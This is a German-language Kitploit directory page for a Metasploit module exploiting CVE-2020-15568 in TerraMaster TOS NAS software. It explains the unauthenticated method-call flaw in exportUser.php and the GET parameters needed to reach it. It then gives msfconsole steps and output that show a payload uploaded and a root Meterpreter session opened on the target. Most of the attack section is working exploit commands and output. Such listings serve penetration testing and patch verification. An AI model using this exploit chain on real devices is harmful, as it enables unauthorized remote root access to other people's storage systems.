Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
TerraMaster-TOS-CVE-2020-15568 — Repository für das CVE-2020-15568 Metasploit-Modul | Kitploit
Tools/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
Exploit-FrameworksSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

Repository für das CVE-2020-15568 Metasploit-Modul

Repository anzeigen
33vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

TerraMaster TOS CVE-2020-15568

Repository für das Metasploit-Modul CVE-2020-15568

Angreifbare Anwendung

Beschreibung

Eine Schwachstelle durch dynamischen Methodenaufruf in der Datei include/exportUser.php ermöglicht die Ausführung von Remote-Befehlen auf TerraMaster-Geräten mit Root-Rechten. Die anfällige Datei erfordert mehrere HTTP-GET-Parameter, um den Methodenaufruf zu erreichen und diese Schwachstelle auszunutzen. In der ersten Zeile bindet die Anwendung app.php ein, das relevante Kernklassen der TOS-Software automatisch lädt. Die Anwendung entscheidet über die Operation basierend auf dem Wert des GET-Parameters type. Wenn der Wert der Variable type etwas anderes als 1 oder 2 ist, kann der anfällige Code erreicht werden. Der Quellcode von exportUser.php erfordert die HTTP-GET-Parameter cla (Abkürzung für class), func und opt.

Bei der Code-Überprüfung anderer Dateien wurde ebenfalls festgestellt, dass es eine Möglichkeit gibt, dieses Problem mit bereits vorhandenen Klassen in der TOS-Software auszunutzen. Die PHP-Klasse in include/class/application.class.php ist der beste Kandidat, um Befehle auf Geräten auszuführen, die TOS-Software betreiben. Da exportUser.php keine Authentifizierungskontrollen hat, ist es einem nicht authentifizierten Angreifer möglich, Codeausführung zu erreichen.

Überprüfungsschritte

  1. Richten Sie Ihr TerraMaster NAS mit TOS-Version 4.1.24 oder niedriger ein.
  2. Starten Sie msfconsole
  3. Führen Sie aus: use exploit/multi/http/terramaster_command_exec
  • Führen Sie set rhost 192.168.1.27 aus
  • Führen Sie: check
  • root@kitploit:~
    [+] 192.168.1.27:80 - The target is vulnerable.
    

    Ziele

    root@kitploit:~
    Exploit targets:
       Id  Name
       --  ----
       0   Auto
    

    Szenarien

    root@kitploit:~
    msf5 > use exploit/multi/http/terra_master_command_exec 
    msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
    rhost => 192.168.1.27
    msf5 exploit(multi/http/terramaster_command_exec) > run
    [+] Payload uploaded to /logs/FJETBHLL/.vatw.php
    [+] Payload successfully triggered !
    [*] Started bind TCP handler against 192.168.1.27:9090
    [*] Sending stage (38288 bytes) to 192.168.1.27
    [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
    meterpreter >
    
    Tool herunterladen